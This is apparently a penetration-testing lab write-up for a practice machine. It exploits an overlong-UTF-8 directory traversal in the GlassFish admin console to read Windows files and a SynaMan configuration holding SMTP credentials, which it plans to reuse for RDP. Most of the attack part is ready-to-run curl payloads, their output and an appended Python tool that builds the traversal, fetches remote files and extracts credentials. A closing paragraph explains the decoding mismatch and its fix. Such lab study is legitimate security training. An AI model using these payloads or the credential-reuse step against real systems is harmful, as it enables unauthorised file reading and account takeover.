Directory Traversal


A directory traversal vulnerability was identified, and confirmed exploitable, in the GlassFish administration console on target port 4848. The payload starts from /theme/META-INF/prototype and uses the overlong UTF-8 sequence %c0%af (a two-byte encoding of '/') after each '..' hop, so the literal string '../' never appears in the traversal segment of the request:

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fish]
└─$ LFI=$(echo -n '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../Windows/win.ini') ; curl -s "http://$IP:4848/theme/META-INF/prototype$LFI"
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Confirmed: the response is the contents of C:\Windows\win.ini, so arbitrary files on the host can be read as the GlassFish service account.

SynaMan


A SynaMan instance, apparently a vulnerable version, is running on target port 6060 and appears to be affected by CVE-2018-10814. No credentials are known at this time, so the next step is to read its configuration file through the GlassFish directory traversal found above.

According to the official documentation, the configuration file, AppConfig.xml, is located in the C:\Synaman\config directory by default on a Windows installation, so it can be reached with the same traversal path (the path is case-insensitive on Windows):

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fish]
└─$ LFI=$(echo -n '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../SynaMan/config/AppConfig.xml') ; curl -s "http://$IP:4848/theme/META-INF/prototype$LFI"
<?xml version="1.0" encoding="UTF-8"?>
<Configuration>
	<parameters>
		<parameter name="adminEmail" type="1" value="admin@fish.pg"></parameter>
		<parameter name="smtpSecurity" type="1" value="None"></parameter>
		<parameter name="jvmPath" type="1" value="jre/bin/java"></parameter>
		<parameter name="userHomeRoot" type="1" value="C:\ProgramData\SynaManHome"></parameter>
		<parameter name="httpPortSSL" type="2" value="-1"></parameter>
		<parameter name="httpPort" type="2" value="0"></parameter>
		<parameter name="vmParams" type="1" value="-Xmx128m -DLoggingConfigFile=logconfig.xml"></parameter>
		<parameter name="synametricsUrl" type="1" value="http://synametrics.com/SynametricsWebApp/"></parameter>
		<parameter name="lastSelectedTab" type="1" value="1"></parameter>
		<parameter name="emailServerWebServicePort" type="2" value=""></parameter>
		<parameter name="imagePath" type="1" value="images/"></parameter>
		<parameter name="defaultOperation" type="1" value="frontPage"></parameter>
		<parameter name="publicIPForUrl" type="1" value=""></parameter>
		<parameter name="flags" type="2" value="2"></parameter>
		<parameter name="httpPort2" type="2" value="6060"></parameter>
		<parameter name="useUPnP" type="4" value="true"></parameter>
		<parameter name="smtpServer" type="1" value="mail.fish.pg"></parameter>
		<parameter name="smtpUser" type="1" value="arthur"></parameter>
		<parameter name="InitialSetupComplete" type="4" value="true"></parameter>
		<parameter name="disableCsrfPrevention" type="4" value="true"></parameter>
		<parameter name="failureOverHttpPort" type="2" value="55222"></parameter>
		<parameter name="smtpPort" type="2" value="25"></parameter>
		<parameter name="httpIP" type="1" value=""></parameter>
		<parameter name="emailServerWebServiceHost" type="1" value=""></parameter>
		<parameter name="smtpPassword" type="1" value="KingOfAtlantis"></parameter>
		<parameter name="ntServiceCommand" type="1" value="net start SynaMan"></parameter>
		<parameter name="mimicHtmlFiles" type="4" value="false"></parameter>
	</parameters>
</Configuration>

The configuration file reveals a set of SMTP credentials in the smtpUser and smtpPassword parameters: arthur:KingOfAtlantis. It also shows disableCsrfPrevention set to true, which is worth noting for later. The credentials may be reused elsewhere; the next step is to validate them against the target's RDP service.
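As an added example (not part of the original write-up, and not code from GlassFish or SynaMan), the following Python helper ties the two steps above together: it builds the overlong-UTF-8 traversal URL used against port 4848, shows why a component that percent-decodes strictly and a component that decodes UTF-8 leniently disagree about how many '..' hops the same path contains, and pulls the SMTP credential pair out of AppConfig.xml. The prefix /theme/META-INF/prototype and the depth of 12 hops are taken from the commands above; the lenient decoder is a deliberately simplified illustration of the class of decoder that accepts overlong sequences, not GlassFish's actual code; the host 192.0.2.10 is a placeholder; the sample XML is a trimmed copy of the file recovered above. Only fetch_file() touches the network.

```python
"""Added example, not from the original write-up: overlong-UTF-8 traversal
helpers plus a parser for SynaMan's AppConfig.xml. Only fetch_file() touches
the network; everything else runs offline."""
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

# Two-byte overlong encoding of U+002F '/': bytes C0 AF. Strict UTF-8 decoders
# reject it (the shortest form of '/' is one byte); lenient ones yield '/'.
OVERLONG_SLASH = "%c0%af"
TRAVERSAL_PREFIX = "/theme/META-INF/prototype"   # starting point used in the write-up


def traversal_url(base, target_path, depth=12):
    """Build the URL used above: prefix, then '%c0%af..' repeated `depth`
    times, then a literal '/' and the target path (e.g. 'Windows/win.ini')."""
    hops = (OVERLONG_SLASH + "..") * depth
    return f"{base.rstrip('/')}{TRAVERSAL_PREFIX}{hops}/{target_path.lstrip('/')}"


def lenient_utf8(data):
    """Decode bytes as UTF-8 while accepting 2-byte overlong forms (illustrative
    decoder, not GlassFish's). Only ASCII and 2-byte sequences are handled,
    which is enough for the payload above."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            # A strict decoder would refuse the C0/C1 lead bytes here; this one does not.
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            raise ValueError(f"unsupported byte {b:#x} at offset {i}")
    return "".join(out)


def decode_strict(raw):
    """Percent-decode as a strict UTF-8 consumer would: invalid bytes become U+FFFD."""
    return urllib.parse.unquote(raw, errors="replace")


def decode_lenient(raw):
    """Percent-decode to bytes, then run the overlong-tolerant decoder."""
    return lenient_utf8(urllib.parse.unquote_to_bytes(raw))


def traversal_hops(decoded_path):
    """Number of '/..' segments a path-walking component would act on."""
    return decoded_path.count("/..")


def parse_appconfig(xml_text):
    """Map every <parameter name=... value=...> in AppConfig.xml to a dict."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    return {p.get("name"): p.get("value") for p in root.iter("parameter")}


def extract_smtp_credential(xml_text):
    """Return (smtpUser, smtpPassword) from AppConfig.xml, or (None, None)."""
    params = parse_appconfig(xml_text)
    return params.get("smtpUser"), params.get("smtpPassword")


def fetch_file(base, target_path, depth=12, timeout=10):
    """Read a file from the target through the traversal (network; not run by tests)."""
    with urllib.request.urlopen(traversal_url(base, target_path, depth), timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Trimmed copy of the AppConfig.xml recovered above, kept inline so the parser runs offline.
SAMPLE_APPCONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Configuration>
  <parameters>
    <parameter name="smtpServer" type="1" value="mail.fish.pg"></parameter>
    <parameter name="smtpUser" type="1" value="arthur"></parameter>
    <parameter name="smtpPassword" type="1" value="KingOfAtlantis"></parameter>
    <parameter name="disableCsrfPrevention" type="4" value="true"></parameter>
  </parameters>
</Configuration>"""


if __name__ == "__main__":
    # 192.0.2.10 is a placeholder host; swap in the real target to use fetch_file().
    url = traversal_url("http://192.0.2.10:4848", "SynaMan/config/AppConfig.xml")
    path = url.split(":4848", 1)[1]
    print("strict view sees", traversal_hops(decode_strict(path)), "hops")
    print("lenient view sees", traversal_hops(decode_lenient(path)), "hops")
    print("credential:", extract_smtp_credential(SAMPLE_APPCONFIG))
```

The point of the two decoders is the validation/resolution mismatch: a check that percent-decodes the request as strict UTF-8 sees a path with no '/..' segments at all (the C0 AF pairs become replacement characters), while the component that later walks the filesystem and tolerates overlong forms sees every hop. Canonicalising once, strictly, and validating the result is the fix, not a blacklist on the raw request string.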